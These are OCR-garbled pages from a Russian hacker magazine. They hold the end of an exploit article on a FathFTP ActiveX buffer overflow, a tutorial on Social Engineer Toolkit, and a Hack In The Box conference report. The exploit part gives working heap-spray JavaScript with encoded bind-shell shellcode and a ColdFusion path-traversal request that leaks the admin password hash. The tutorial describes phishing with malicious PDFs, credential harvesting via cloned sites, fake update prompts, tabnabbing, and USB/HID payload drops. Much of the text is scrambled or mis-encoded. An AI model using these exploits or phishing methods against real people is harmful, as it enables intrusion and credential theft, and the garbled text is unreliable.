Банальная ошибка — переполнение буфера в стеке. В частности. то середина памяти всегда под нашим контролем. что адрес.cfm?locale=ru При таком запросе админка будет отображена на русском языке./. и теперь вместо кода обработки ошибки выполнится тот код.loginform.exe XÀÊÅÐ 10 /141/ 10 . В конце добавляем шеллкод — открытие бэкдора на 28876 порту. на который мы указали.html 05 ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА В FATHFTP ном она нужна веб-разработчикам для автоматизации работы с FTP посредством HTML. что эксплойт. был без всего — пустым. в эти задания можно добавить свой скрипт на ColdFusion. согласно совету Нильса Тьусинка (Niels Teusink): 1. шелл (в винде — права SYSTEM). например. Затем формируем буфер для FathFTP.ВЗЛОМ http://server/CFIDE/administrator/enter. 3. Поэтому в конце добавляем нулевой байт и сигнатуру используемой локали — «en» (есть везде). æìåì «Enter». В любом случае. из вершины цепочки SEH-адресов. который дает. В результате SEH-указатель станет равным 0x0C0C0C0C. дело в том. Если мы говорим о Heap Spray. properties%00en В итоге мы получим SHA1-хеш пароля админа. Напомню. можно уже идти ломать брутфорсом.salt. К великой удаче именно по этому адресу находится один из элементов динамического массива. но можно поступить хитрее. 6. Поэтому мы забираем столько памяти. Большой динамический массив — много памяти в куче. при переполнении буфера в стеке мы потерли в стеке указатель на данные. который должен выполниться в том случае. Îòñûëàåì îòðåäàêòèðîâàííûé çàïðîñ. а там с большой вероятностью наш шеллкод (вернее. будем использовать адрес 0x0C0C0C0C. уязвимы все версии под все ОС. Adobe выпустил hotfix. В принципе.document.. собственно. который лежит в директории. В девятой версии при настройках по умолчанию уязвимость не работает. 5.value)./. Далее используется обыкновенная последовательность для выхода за директорию с шаблонами — «. Æìåì êíîïêó «Login»./.cfm?locale=. Надо отметить. например. и в качестве параметра указываем нашу строку с 0x0C. который и подгружается. по сути — указатель на код. файлы нас интересуют? Ну. Процессор пройдется по цепочке 0x90 — пустым операторам — и дойдет до шеллкода. в общем. Именно этот адрес мы и перезаписали. где установлена платформа — C:/ColdFusionX/lib/password.

i++) mem[i]=bk+shell. может помочь. XÀÊÅÐ 10 /141/ 10 while(bigbk.bigbk.substring(0. Kill bit запрещает подгружать компонент через браузер.length.space). </script> </html> SOLUTION Патча нет.FileExists(buff). var buff="".substring(0. var space=header+shell. var mem=new Array(). в принципе.Переполнение буфера в стеке — классика жанра var shell = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b 3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348 b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df %u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b% u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u 1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7 768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc5 89%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7da b%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6 %u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70% uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%u ffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u1 06a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53 db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec 0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0 %u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd% ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u 5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uf fff%uc483%u615c%u89eb"). var header=20. Если все же у тебя каким-то образом оказалось данное ПО. Для установки бита нужно зайти в реестр. //Ãîòîâèì heap-spray. создать там раздел 62A989CE-D39A-11D5-86F0-B9C370762176 и параметр Compatibility Flags. while(bk. i<1540. z 047 . i<800. либо удали. в ветку HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Internet Explorer\ActiveX Compatibility\.length+space<0x40000) bk= bk+bk+fillbk.length-space). var fillbk=bigbk. //Áîëüøàÿ ñòðîêà ñ 0x0C for(i=0.length < space) bigbk+=bigbk. либо установи Kill bit. туда занести значение 0x00000400. что. var bk=bigbk. //Ïåðåïîëíÿåì áóôåð… target.i++) buff+=unescape("%0c%0c%0c%0c"). типа REG_DWORD. //Áîëüøîé ìàññèâ for(i=0. 90 — nop var bigbk=unescape("%u9090%u9090").

слабость человека — нет. читай в «PSYCHO». Так перейдем от слов к делу. â ìèð íóëåé è åäèíèö. Ñàìîå öåííîå çäåñü — ýòî çíàíèå.E.T. è íåçíàíèå êîòîðûõ ïðèâîäèò ê ïå÷àëüíûì ïîñëåäñòâèÿì. Ìû ñàìè ðâåìñÿ â íåãî ñ ãîëîâîé. а на входе стоит человек. благодаря каким изъянам человека можно проникнуть внутрь.com/social_engineering_ toolkit /pentest/exploits/SET XÀÊÅÐ 10 /141/ 10 . цель которой — доступ к системе. Для начала обновим (установим) SET следующей командой: svn co http://svn. к которой идет через километры проводов и радиоволн. а я расскажу об инструменте. а поступки его предсказуемы. ýìîöèè. Ïðàâèëàì. Как результат — неограниченный простор для фантазии. Данный toolkit достаточно недавно появился на свет.. на котором мы и будем производить все манипуляции. А поможет нам в этом Social Engineer Toolkit (SET).. âìåñòå ñ íàøèìè vulnerability. Ýòîò ìèð æèâåò ïî ñâîèì ïðàâèëàì. Слабость системы можно закрыть патчем раз и навсегда.ВЗЛОМ Дмитрий «D1g1» Евдокимов dsecrg. INTRODUCTION Человек — самое слабое звено в системе — это уже давно известно. äà è æèçíü â öåëîì âñå áîëüøå è áîëüøå ïåðåíîñÿòñÿ â ìèð êîìïüþòåðîâ. которой поможет сделать эту дорогу более простой и комфортной. распространяющим его под лицензией GPLv2. 048 IT IS BEATIFUL S.com «ÄÅÐÆÈ ÄÐÓÇÅÉ ÁËÈÇÊÎ. написанный специалистом по безопасности David Kennedy (ReL1K).. Его действия порой необоснованны и не подчиняются никакой логике. но сразу обрел популярность и был включен в BackTrack. êîòîðûå ìåíÿþòñÿ êàæäûé äåíü. ñàìîå ìîùíîå îðóæèå çäåñü — ýòî çíàíèå. Ìû ñàìè ñîçäàëè ýòîò ìèð. О том.thepentest. îòíîøåíèÿ. Человек непостоянен. и дорога. À ÂÐÀÃΠÅÙÅ ÁËÈÆÅ» (Ìàêèàâåëëè) ÑÎÖÈÀËÜÍÀß ÐÅÀËÜÍÎÑÒÜ SET — ëó÷øèé íàáîð ãåíèàëüíîãî õàêåðà Ïîñòåïåííî ÷åëîâå÷åñêèå ÷óâñòâà. â ìèð ãëîáàëüíûõ ñåòåé..

Сайт www. реализующие уязвимости типа file format. Не стоит забывать. что это проект open-source. которые отвечают за взаимодействие SET и сторонних программ (и их поведения). где лишь необходимо выбирать желаемые пункты работы приложения. SET использует много сторонних проектов. обойтись и без них. sendmail. реализующие уязвимости в браузерах: • • • • • • LNK Code Execution (MS10-046) Help Center XSS and Command Execution (MS10-042) IE iepeers. SET невидимо для пользователя использует сторонние программы. Работа ведется через интерактивное меню. ведь именно это тебе не терпится сделать. SET предоставляет собой функционал для проведения четырех основных векторов атаки: Основные вектора атаки SET • E-MAIL ATTACK VECTOR • WEB ATTACK VECTOR • CD/DVD/USB ATTACK VECTOR • Teensy USB HID ATTACK VECTOR При проведении атаки через е-mail используются эксплойты. ettercap. и для этого придется обратиться к файлу настроек: /pentest/exploits/SET/config/set_config В set_config по большей части находятся настройки. и в нем всегда можно поразбираться. но функционал программы намного уменьшится.collectEmailInfo Buffer Overflow Adobe Collab.social-engineer. На каждом шаге меню сопровождается хорошим описанием предлагаемых подпунктов. как это ни удивительно. такие как: • Adobe Flash Player 'newfunction' Invalid Pointer Use XÀÊÅÐ 09 /140/ 10 SET запущен на Nokia N900 • • • • • Adobe Collab. которые бы пришлось устанавливать дополнительно.dll Use After Free (MS10-018) IE Tabular Data Control Exploit (MS10-018) IE "Aurora" Memory Corruption (MS10-002) è äðóãèå 049 . Но давай перейдем к рассмотрению арсенала SET. что он написан на Python и при этом не требует никаких сторонних питоновских модулей. которые уже есть в составе дистрибутива: Metasploit. Но сам toolkit оттюнинговать в некоторых ситуациях просто необходимо. эксплойты.getIcon Buffer Overflow Adobe JBIG2Decode Memory Corruption Exploit Adobe PDF Embedded EXE Social Engineering è äðóãèå А при атаке через веб-вектор. Итак. улучшить и подправить. apache и др.org Прелесть SET заключается в том. помимо интерпретатора Python. Для своей работы. так что справится даже ребенок (тут становится немного страшно :)). конечно. что-то добавить (0-day например). Можно. не вовлекая его в премудрости настройки последних.

и как можно воспользоваться этим на практике. то тут есть три варианта: • Gmail-àêêàóíò • Ñâîé Sendmail open-relay • ×åé-òî open-relay ñåðâåð Метод Java Required в деле Надежность каждого эксплойта равна его надежности из metasploit. Cisco. BP. но очень интересный bash-скрипт — metasploit-fakeUpdate. что среди компаний были такие монстры. ну. 050 Как видишь. Говоря о способе через веб. Хотя современные браузеры и стараются бороться против поддельных сайтов. В качестве флагов использовались: название кофе-машины в компании. захват флагов. не выходя из SET. Всем участникам были розданы целевые компании. Для этого скрипт автоматически поднимает DHCP и веб-сервер. либо заранее найти open-relay в интернете. XÀÊÅÐ 10 /141/ 10 . Автор SET не пишет своих эксплойтов. Symantec. а порой просто подводит человеческая невнимательность. Формат данного файла очень прост — один адрес на строку. В принципе. запускает DNSSpoof и ARPSPoof. но только флаги тут были необычные. Для этого в главном меню выберем пункт «Spear-Phishing Attack Vectors». можно сделать шаблон и в дальнейшем использовать его при необходимости. При этом участникам запрещалось выдавать себя за работников государственных учреждений. и находится он в /pentest/exploits/SET/config/mailing_list. Reverse VNC.Org и Offensive Security. А теперь давай поподробней остановимся на каждом из векторов атак и посмотрим. а просто позволяет получить доступ к проверенным и хорошо зарекомендовавшим себя эксплойтам в Metasploit. чем первый. Для начала нужно определиться с количеством целей. принимает человек. так и любым твоим PDF-вложением. но никакой финансовой информации. информацию о которых им необходимо было добыть. а без соблазна получить что-нибудь на халяву — еще сложней. протроянить жертву.. так как целевые компании были реальными. который позволяет с помощью поддельного окна обновления. а затем наш «патч» запускает выбранную нагрузку. А так все сродни написанию обычного письма — необходимо заполнить тему письма и его содержание. Что касается отправки письма. E-MAIL ATTACK VECTOR Начнем наше путешествие с email-вектора атаки. а не вымышленными. WEB ATTACK VECTOR Данный вектор атаки предоставляет нам более интересные. чтобы смотреть. даже очень хорошо :). Ну. как Google. но не стоит забывать. из-за чего жертва никак не может попасть на желаемый сайт. а сказка. чтобы каждый раз не повторять один и тот же ввод. правоохранительных органов или юридических лиц. есть варианты на любой вкус: можно отправить письмо через свой Gmail-аккаунт. название браузера. что у жертвы может использоваться механизм «reverse lookups». которая даже разослала всем своим клиентам предупредительное письмо с заголовком «Warning Regarding DEF CON 18 Social Engineering Contest». окончательное решение о том. Остается поднять listener и ждать. как раз в этом моменте и происходит взаимодействие SET и metasploit. говорящем о необходимости установить patch для закрытия критической уязвимости (есть поддержка Linux. весь набор данного софта уже предустановлен во всеми любимом BackTrack. как и в любом CTF. А когда халява сама приходит тебе на электронный ящик — это вообще не жизнь. воспользоваться Sendmailсервером. и слать через него. или. Microsoft. OSX. изощренные и разноплановые способы атаки пользователей. Как можно заметить. собственно. Хочется также упомянуть компанию Digital Defense. Чтобы определить. Боевая нагрузка (Meterpreter Reverse_TCP. А задачей участников был. metasploit-fakeUpdate Хакер под ником g0tmi1k написал небольшой. кто обрабатывает информацию в шредере и многое другое. Windows). ведь SET предоставляет два режима рассылки: Social Engineering CTF Данное событие впервые произошло не так давно. На выходе мы можем получить консоль meterpreter и SBD (Secure BackDoor) или VNC. Apple и Walmart. Reverse TCP Shell) вместе с эксплойтом прозрачно выбираются из metasploit и идут внутри присоединенного к письму PDF-файла. штат Nevada. Oracle. Но самым дорогим флагом было заставить сотрудника компании посетить определенный URL. Стоит отметить. Также есть возможность указать необходимый sniffer из набора dnsiff. который может быть как заготовкой SET. пока человеческий фактор сыграет злую шутку. что делает жертва. txt. проходящую через атаки этого типа — использование поддельной веб-страницы на автоматически поднимаемом веб-сервере. и только законными способами.ВЗЛОМ • Èíäèâèäóàëüíàÿ ðàññûëêà • Ìàññîâàÿ ðàññûëêà Для массовой рассылки необходим заранее сформированный файл со списком целевых адресов. McAfee.nse <host> Благодаря оpen-relay можно отсылать письма с чужих адресов. а также нельзя было связываться с родственниками сотрудников компаний. можно выделить и общую черту (с единственным исключением). Как сказали организаторы. какие атаки они несут на самом деле. который будет автоматически поднят SET на BackTrack. который способен определить соответствие доменного имени отправителя письма. можно воспользоваться готовым NSE-скриптом Nmap: nmap --script smtp-open-relay. когда жертва падет под нашим натиском и установит «обновление». антивируса и их версии. а именно — на DEFCON 18 в Riviera Hotel & Casino в Las Vegas. паролей пользователей и персональных данных. В наше время сложно представить человека без электронной почты.. соревнование прошло хорошо. Нам лишь остается ждать. Shell. используя свои навыки в области социальной инженерии. и даже то. Организаторами этого состязания были Social-Engineer. в котором призывала их быть очень бдительными на время данного мероприятия. прописанный backdoor. а постоянно видит поддельное окно с просьбой установить патч. доверять или не доверять сайту. является ли SMTP-сервер open-relay.

Данная атака формирует специальную страницу. Skype. данные с которого нас интересуют. что мы видим. стало возможно использовать SSL (как самоподписанный. главное. Метод «Man Left in the Middle Attack» был внесен в toolkit человеком с ником Кос и использует HTTP REFERER для сбора данных из полей.6. чтобы что-то просмотреть в будущем и т. когда жертва будет просматривать свои вкладки. В таком случае жертва вместо оригинального сайта попадает на наш поддельный сайт. но никто не мешает после создания файла подменить его на нормальный в /pentest/exploits/SET/src/program_ junk/<name_file>. Так как данный вектор сводится к созданию подложного сайта и заманиванию на него жертвы. Ну и. что для ее просмотра необходима Java. эксплуатацию уязвимостей браузеров никто не отменял. применив социальную инженерию. и чтобы пользователь не заметил подвоха в адресной строке. Второй режим самый лакомый — это полное клонирование веб-страницы любого сайта. стоит вспомнить о первом векторе атаки. Jabber или e-mail. «Идет загрузка . если цель принимает его. com/2010/05/scriptvideo-metasploitfakeupdate-v011. возможно. email-рассылки. У многих людей при серфинге интернета открыто много вкладок: для часто посещаемых сайтов. то SET берет на себя первую часть плана и справляется с ней на «отлично».1 • Open-relay — это когда почтовый сервер разрешает пересылку почты куда угодно и кому угодно. чтобы у него на машине стояла Java. автора metasploitfakeUpdate INFO info • Последняя актуальная версия SET на момент выхода статьи — v0. когда пользователю надоедает ждать загрузки страницы.bit.. как ее установить. Естественно. можно применить ARP-spoofing. здесь дело ограничивается лишь твоей фантазией. это вполне возможно. И последний режим дает возможность поднять свой собственный сайт. попробуйте открыть ссылку с помощью IE». зайдя в пункт web-attack — это The Java Applet атака. Так как большинство новых эксплойтов пробивают к IE (не факт.blogspot. Так что с его помощью очень просто слить аутентификационные данные ничего не подозревающего пользователя. Да. За такой замечательный Java Applet мы должны сказать спасибо Thomas Werth. который может прекрасно работать и через веб. что жертва им пользуется). а что скинули посмотреть по мессенджеру ICQ. Лучше всего данный шаблон выбирать при проведении атаки Java Applet. Java Applet спуфит поддельный Java Certificate. так и заранее купленный сертификат). Этот метод является единственным. В принципе. на ней запускается XÀÊÅÐ 10 /141/ 10 metasploit payload. SET прекрасно работает в связке с ettercap. «Идут профилактические работы». Через несколько секунд мы уже имеем копию любой веб-страницы.». который будет ждать своего часа. и начиная с версии SET 0. но об этом чуть позже. какой ОС и каким браузером пользуется пользователь. А дальше наша страничка работает аналогично методу Credential Harvester. «Содержание данного сайта несовместимо с вашим браузером. заставить юзера зайти по ссылке именно с помощью IE — как показывает практика. Здесь SET на созданную нами страницу помещает эксплойт.1. и. жертва должна находиться в нашей же подсети. ведь его задача заключается в сборе всей информации.. Метод «Credential Harvester» очень прост как в реализации. Здесь можно развернуть как какой-нибудь большой сайт. которую ушастый юзер ввел на странице подготовленного нами сайта. Twitter Java Required Êëîíèðîâàíèå ñàéòà Ñîáñòâåííûé ñàéò Среди сайтов-заготовок. указав лишь директорию на диске.html — запись в блоге g0tmi1k. конечно.com — сайт David Kennedy (ReL1K). Говоря о почте. и он переключается на другую вкладку в браузере.pdf. и для этого есть пункт «The Metasploit Browser Exploit Method». ни редакция за твои действия ответственности не несет! 051 . звонка из техподдержки провайдера. Для этого при рассылке в текст письма добавляем URL. Получается. вектор атаки через почту не предоставляет возможности отправки нормального файла. Уже в следующий раз. которые пользователь заполнил на сайте. то можно.HTTP://WWW links Teensy USB HID Как упоминалось ранее. Самым главным достоинством данного метода является то. наша подготовленная страница изменит свой вид на вид страницы от популярного почтового сервиса. предварительно сжатый с помощью сервиса www.. куда мы хотим позаимствовать аутентификационные данные. но необходимо наличие уязвимости типа XSS на реальном сайте. Также заманить пользователя на наш сайт можно с помощью XSS. она наткнется уже на сильно знакомый ему интерфейс и. при попадании на который появляется страничка с сообщением. Естественно.. что нас не интересует. предоставляя нам три варианта создания такого типа сайтов: • è • • Çàãîòîâêè Gmail..». чтобы жертва ничего не заподозрила и как можно дольше пробыла на сайте.6. Для этого достаточно лишь сообщить toolkit’у необходимый URL. С большим количеством открытых вкладок и с течением времени достаточно трудно вспомнить. а дальше — дело техники. что мы просто используем XSS на реальном сайте в режиме Credential Harvester и получаем нужный нам profit.ly (или ему подобным). Главное. Первое.. так и просто страницу с ошибками «404». для ее проведения.д. для которого можно не создавать поддельный сайт. Facebook. Google. WARNING warning Внимание! Информация представлена исключительно с целью ознакомления! Ни автор. и подробная инструкция о том.org — сайт о Exploiting Human Vulnerabilities • g0tmi1k. Так что атака может стать еще более мощной и красивой. так и в применении. наверное. а затем. где он расположен. • secmaniac. стоит остановиться только на «Java Required». что открыл сам. Как раз на это и рассчитана Tabnabbing-атака. com/metasploitunleashed/SocialEngineering-Toolkit — сайт Metasploit Unleashed об использовании SET • social-engineer. захочет проверить свою почту в данном окне (не набивать же адрес заново в новом). на которой первоначально красуется надпись «Please wait while the site loads. автора Social-Engineering Toolkit (SET) • offensive-security.

дело осталось за малым — залить нужную нам нагрузку в pde-формате на Teensy. И это еще не все — устройство обладает таймером и датчиком. позволяет обойти любой запрет на автозагрузку и т. социальная инженерия набирает новые обороты — благодаря ей можно добиться того. а вот компьютерная грамотность — только падает.. который затем с помощью Arduino IDE и Teensy Loader по USB заливается на устройство. Если данного набора тебе недостаточно. что оно определяется в системе немного дольше. количестве итераций кодирования нагрузки (для AV bypass) и порта для reverse-connect. запускающий program. это только начало. Правда. RAM-память 2. CONCLUSION Как видишь. так что пробив растет. мой друг.exe. в зависимости от модели. создаваемое mfu он генерирует нашу нагрузку в teensy. SET позволяет создать необходимый материал для такой атаки. Стоит отметить. z XÀÊÅÐ 10 /141/ 10 . так что данное направление проникновения в систему до сих пор представляет определенный интерес. может быть незаметно установлено на компьютер. TEENSY USB HID ATTACK VECTOR Благодаря IronGeek и WinFang в SET появился такой изощренный вектор атаки. элегантно own'им ее. имея очень маленький размер. для этого придется немного раскошелиться. только незаметность) получаем физический доступ к системе и незаметно.д. В результате в корневой папке SET появится папка autorun с двумя файлами: program. да и LNK-эксплойт во всю свирепствует. чего не сможет ни один эксплойт. что как следствие. что оно является программируемым и определяется в системе как USB-клавиатура. что дает возможность запуска начинки при определенных условиях. Оно также не нуждается в специальных драйверах и. что в качестве нагрузки можно использовать Powershell HTTP GET MSF. но это того стоит. А с привлечением автоматизированных средств это становится сделать намного более просто и массово.ВЗЛОМ mfu в действии CD/DVD/USB ATTACK VECTOR Далеко не у всех в настройках отключена автозагрузка.pde. 052 Сообщение о критической уязвимости. пока хозяин машины отвлекся. как Teensy USB HID (human interface device). В общем. то можно написать свой payload на C или воспользоваться Arduino IDE. И это только начало.. чем обычное USB U3 устройство.exe (наш payload) и autorun. Вот тут как раз нам и поможет SET. которое понимает USB HID out of the box! Теперь в манере агента 007 (никаких убийств. флеш-память 32-128 Кб.5-8 Кб и стоит этот малыш $18-27. Для этого необходимо воспользоваться пунктом меню Infectious Media Generator. Растет и количество пользователей ПК. Teensy — это очень маленькое программируемое устройство с mini-USB интерфейсом. Encoder. WSCRIPT HTTP GET MSF и Powershell based Reverse Shell. Прелесть данного устройства заключается в том. который любезно поинтересуется о твоих предпочтениях в payload.inf. Teensy USB на борту имеет AVR-процессор с частотой 16 МГц. Единственным недостатком является то. Записываем полученный материал на CD/DVD/USB и подсовываем жертве.

Ñæëìáíá .

хоть и конференции некоммерческие. ÂÏÅÐÅÄ! Итак. кроме. самые интересные из которых мы в конце рассмотрим подробнее. Федор Ярочкин. должен рассказать всему миру. XÀÊÅÐ 10 /141/ 10 . И все они произвели довольно приятные впечатления. более того — архив со всеми докладами прилагается к диску. все лучшее делается в последний момент. но и интеллигентные и образованные этичные хакеры. хватит вводных слов. конечно. êîíå÷íî æå. начать строить мосты между двумя разными подходами: Compliance First и Security First. с двумя разными докладами была приглашена на конференцию Hack In The box в Амстердаме. 054 Итак. конечно же. коих уже было посещено немало. Saomuil Shah (из NetSquare) и. просто классный парень. в конце концов. объясняя по ходу презентации. и автор знаменитой XProbe). óçíàåøü ìíîãî íîâûõ è èíòåðåñíûõ õàêåðñêèõ ìåòîäèê. дроп и прочее. êòî âûñòóïàåò ñ äîêëàäàìè. и что русским неплохо бы вообще закрыть доступ в интернет (слова Микко Хайпонена из Fsecure. но кто-то же. представители DSecRG. ëþáåçíî îòîáðàííûõ äëÿ òåáÿ èç ýëèòíûõ âûñòóïëåíèé. чтобы. естественно.. за исключением естественно вечных шуток про русских хакеров. начнем с того. откуда я прямиком на поезде направился в Амстердам. разве что. Федор Ярочкин (наш соотечественник. Криса Касперски. бывший работник Qualys). известного эксперта в области безопасности. эмигрировавший в 2000-х в Тайланд. Еще один наш соотечественник. ибо за державу-то обидно..  íåé òû óçíàåøü. начнем с более общего описания докладов. на мой взгляд. Лас-Вегас. Laurent Outdot (директор компании TETHRI Security). В докладе была освещена его любимая тема — соответствие стандартам и реальная безопасность. и пройдемся по наиболее интересным. по совместительству. наконец. так как по факту никто из русских исследователей (имею в виду живущих в России) на столь значимых конференциях не выступал. ÎÁÎ ÂÑÅÌ ÏÎÍÅÌÍÎÃÓ Конференция началась со вступительного слова Антона Чувакина. что наша исследовательская лаборатория в составе двух человек. так как. Путешествие было с пересадкой в Германии. где удалось комфортно поработать и доделать свою презентацию. что уже порядком поднадоело. Итак. произнесенные на конференции T2 в Финляндии). докладам. На конференции выступали такие специалисты. Его мессадж был в том. так что все очень на высоком уровне. как картон. Алексей Синцов. Те. à òàêæå ÷òî òâîðèòñÿ ïîìèìî äîêëàäîâ. что я не осветил. что организаторы конференций выбирают для их проведения интересные места (Амстердам. В очередной раз замечаю. кто же выступал на конференции. как Антон Чувакин (независимый консультант. Дубай) и еще не скупятся на места проведения.ВЗЛОМ Александр "sh2kerr" Поляков ÍÀØÈ ÍÀ HITB Ìèðîâûå äîñòèæåíèÿ ýëèòíîãî âçëîìà  ýòîé ñòàòüå ÿ ïîâåäàþ òåáå îá îäíîé î÷åíü õîðîøåé è èçâåñòíîé êîíôåðåíöèè — Hack In The Box. специализирующегося на вопросах PCI DSS и лог-мэнеджмента. таких как я и всем известный мой коллега. Для нас. ÷òî ïðîèñõîäèò íà òàêèõ êîíôåðåíöèÿõ. чем мы собственно и занимаемся на международных конференциях. ты всегда можешь скачать в интернете и разобраться в них самостоятельно. Íó è. автор известной утилиты X-Probe и. что в России живут не только Блекхаты. Событие на самом деле знаковое. что значат такие термины. лучше посмотрим. рассказывал о русских блекхатах и криминалах.

Подробности ты можешь прочитать в предыдущем номере. Michael Thumann из компании ERNW. 4. ханипоты. 3. 2. Этот доклад я приметил еще на конференции Troopers. когда он был рассказан впервые. и требует обученного персонала. Поддержка IPv6. о котором хотелось бы рассказать. и вот часть из них: 1. качественно отличаясь от того же Nmap количеством посылаемых пакетов (в меньшую сторону.sourceforge. Реально крупного проекта. назывался «How to rate the security of closed source software». XProbe в олдскульные времена была культовой программой. показывая. Следующий доклад. или уже успел позабыть. описывая особенности написания шеллкода для метода JitSpray. Кроме презентации про русских криминалов Федор также рассказывал о новой версии своего старого детища — XprobeNG. В целом звучит неплохо. Что же делать? Ответ прост — в качестве альтернативы предлагается использовать различные метрики. который собрал немало народу на своем выступлении. как легко можно через клиентов SAP получить доступ к корпоративным секретам компании.Корабль. такие как фаззинг. Алексея Синцова. Необходимо ответить на вопрос: можем ли мы доверять этой программе обработку наших критичных данных? Стандартные подходы. где можно было пообщаться с коллегами по всему миру презентацией были проведены Алексеем не зря — народу действительно понравилось. что не все эти нововведения доступны. что тебе необходимо оценить безопасность и уровень доверия для крупного проекта. не подходят — слишком ресурсоемко. В новой версии появилось множество нововведений. прозрачные прокси. жаль только. Для тех. реверс-инжиниринг и сандбоксинг. таких как кэширующие системы. Определение не только ОС. Кроме того. получая в результате по всем проверкам некий общий индекс под названием Thumann’s Trustworthiness Index. К сожалению. пожелаем удачи Федору и не забываем заглядывать на сайт его проекта — http://xprobe. свичи. рассказываю. эту я презентацию пропустил. кто в танке. на котором проводилась Afterparty конференции HITB все это не ново. минимизирующий необходимое количество посылаемых пакетов. системы обнаружения и предотвращения вторжений. реализующие спуфинг атаку. Улучшенный движок. 055 . к примеру. используя нашу тулзу — sapsploit. видать. Помимо этого мне также удалось дать небольшое интервью для BBC Radio1 о безопасности ERP. было очень интересно. но и различных девайсов. используемой для удаленного определения версии ОС. но и любого JIT-компилятора. Автор предлагает следующие: Ïðîâåðêà èñïîëüçîâàíèÿ â áèáëèîòåêå DEP (ðàçðàáîòàíî). так как сам в это время был на параллельном треке — рассказывал про безопасность ERPсистем на примере SAP. что бессонные ночи над этой XÀÊÅÐ 09 /140/ 10 Главный холл конференции. но европейцам. От себя добавлю. но это уже совсем другая история. Остается только разобраться. и рассказывал его один мой знакомый.net. виртуальные машины. порядка тысячи бинарников. в итоге в разы увеличив скорость его работы. Будем надеяться на их скорейшее появление. Определение версии ОС на основе приложений и корреляция данных. Идея его такова: представь себе. Ïðîâåðêà èñïîëüçîâàíèÿ â áèáëèîòåêå ASLR (ðàçðàáîòàíî). поскольку еще находятся в разработке. какие метрики использовать. что это проблема не только Flash. Нельзя не отметить моего коллегу. он продемонстрировал (почти успешно :) атаку на последнюю версию JIT-компилятора в браузере Apple Safari. а также показав. что очень даже важно при анализе больших подсетей). файерволы уровня приложений и даже хосты.

корпоративный файервол и систему обнаружения/предотвращения вторжений стоимостью в $1250. Александр Поляков. Смысл в том. Ïðîâåðêà íà îáðàùåíèå ê ðååñòðó (â ðàçðàáîòêå). Ïðîâåðêà íà èñïîëüçîâàíèå ñåòåâûõ ôóíêöèé (â ðàçðàáîòêå). который представляет собой небольшую коробочку размером меньше точки доступа и аппаратной начинкой. хотя не доверять автору вроде как не с чего — он был основателем XÀÊÅÐ 10 /141/ 10 . которую у меня получилось посетить. Система обучения основана на экспертных системах. чем на покупку готового варианта. В качестве подопытного была проанализирована папка браузера Firefox. особенно для тех. будем надеяться. Ïðîâåðêà íà èñïîëüçîâàíèå íåáåçîïàñíûõ ôóíêöèé (â ðàçðàáîòêå). Надеюсь все то. John Kanen Flowers. что было заявлено. как в Cisco PIX (по заявлениям разработчика). В общем. Прелесть заключается в том. Ïðîâåðêà. Кроме того. и стоит обратить внимание на следующем. какой трафик хороший. Ïðîâåðêà âåðñèè ëèíêîâùèêà (ðàçðàáîòàíî). эксплуатировать ее будет гораздо проще. которые ты можешь собрать в любых комбинациях. есть версия elite под серверную стойку с несколькими сетевыми интерфейсами. но. достаточно указать ей директорию. как система обучилась. Результат получился смешанным — часть библиотек имеют высокий уровень доверия и скомпилированы с использованием DEP и ASLR. будет реально работать. была о новом устройстве под названием kane-box. Казалось бы. найдя в них уязвимость. собственно. как она работает в нормальном режиме. неплохая получилось утилита. Так и с kane-box. ничего нового. уже более глубоком этапе анализа безопасности софтины. базах знаний и теореме Байеса. операционную систему и даже железо. жаль только. Да-да. Антон Чувакиеин. После того. Разработчики полностью отказались от сигнатурного метода и реализовали чисто поведенческий движок. она может определить. о котором поведал ее разработчик. которая осуществляет ряд этих проверок и выдает сводный индекс доверия к анализируемой программе. надо сказать. что пока немного проверок включено. а финансы ограничены. Алексей Синцов PCI DSS. термин open source hardware появился недавно и стремительно набирает обороты. а часть — нет. но вся система основана на OpenSource. что докладчик представил тулзу. Ïðîâåðêà íà ñîçäàíèå ôàéëîâ (â ðàçðàáîòêå). исходя из своих знаний о существующих атаках и о твоей сети. как это работает. Так что желаем успехов создателю и ждем первых образцов. и. Утилита запускается очень просто. да еще и с возможностью анализа беспроводных сетей. а точнее — даже смесь роутера. ÇÀÃÀÄÎ×ÍÀß ÊÎÐÎÁÊÀ Следующая лекция. это неплохо работало. Ïðîâåðêà íà íàëè÷èå ïîäïèñè êîäà (â ðàçðàáîòêå). что производитель выпускает базовые элементы девайса. При запуске система строит модель текущей сети и запоминает. Наконец. а какой плохой. И все это за $250 (с поддержкой WiFi — $300). которым необходимо соответствовать 056 Автерпати традиционно спонсируют Microsoft чтобы отвлечь хакеров хоть ненадолго от взлома своих продуктов )) Русские вайтхаты с лева на право : Федор Ярочкин. На них. Устройство представляет собой систему обнаружения вторжений. потратив на это гораздо меньше денег. èñïîëüçóåòñÿ ëè óïàêîâùèê (â ðàçðàáîòêå).ВЗЛОМ Я собственной персоной Алексей Синцов Ïðîâåðêà èñïîëüçîâàíèÿ â áèáëèîòåêå SafeSEH (ðàçðàáîòàíî). В случае самостоятельной сборки и установки получится еще дешевле. IDS/IPS. если покупать напрямую у разработчика. которая одновременно представляет собой маршрутизатор. и она выдаст результат по всем 